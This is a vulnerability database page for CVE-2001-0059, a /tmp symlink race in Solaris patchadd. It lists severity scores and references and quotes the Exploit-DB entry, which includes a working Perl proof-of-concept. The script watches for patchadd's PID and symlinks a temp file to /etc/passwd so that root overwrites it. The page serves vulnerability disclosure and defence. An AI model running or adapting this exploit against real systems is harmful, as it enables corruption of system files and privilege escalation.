CVE-2001-0059 : Detail

CVE-2001-0059

0.04%V3
Local
2001-05-07
02h00 +00:00
2005-11-02
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

patchadd in Solaris allows local users to overwrite arbitrary files via a symlink attack.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.2 AV:L/AC:H/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20514

Publication date : 2000-12-17 23h00 +00:00
Author : Larry W. Cashdollar
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2127/info patchadd is the patch management tool included with the Solaris Operating Environment, distributed by Sun Microsystems. A problem exists which could allow a user to corrupt or append system files. The problem exists in the creation of /tmp files by patchadd. patchadd creates a variety of files in /tmp while installing the patches on the operating system. The files created in /tmp are mode 0666, and are created with the extension sh<pid of patchadd>.1, sh<pid of patchadd>.2, and so on. Running the program requires administrative access. It is possible to brute force guess the pid of patchadd, and create files in the /tmp directory that are symbolic links to sensitive system files. It is therefore possible for a user with malicious intent to gain elevated privileges, corrupt system files, or execute arbitrary commands. #!/usr/local/bin/perl #Exploit for patchadd Solaris 2.x. Symlink /tmp file creation #vulnerability #patchadd creates files in /tmp with mode 644 that can be used to clobber #system files when executed by root. #Larry W. Cashdollar #http://vapid.dhs.org:8080 #See BID https://www.securityfocus.com/bid/2127 #Discovery credit: Jonathan Fortin [email protected] #Tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc SUNW,Ultra-5_10 use strict; my $NOISY = 1; # Do you want quiet output? my $clobber = "/etc/passwd"; print "Listening for patchadd process...\n" if ($NOISY); while(1) { open (ps,"ps -ef | grep -v grep |grep -v PID |"); while(<ps>) { my @args = (split " ", $_); if (/patch/) { print "Targeting PID $args[1] and symlinking response.$args[1] to $clobber\n" if ($NOISY); symlink($clobber,"/tmp/response.$args[1]"); exit(1); } } }

Products Mentioned

Configuraton 0

Sun>>Sunos >> Version 5.7

References

http://marc.info/?l=bugtraq&m=97720205217707&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/2127
Tags : vdb-entry, x_refsource_BID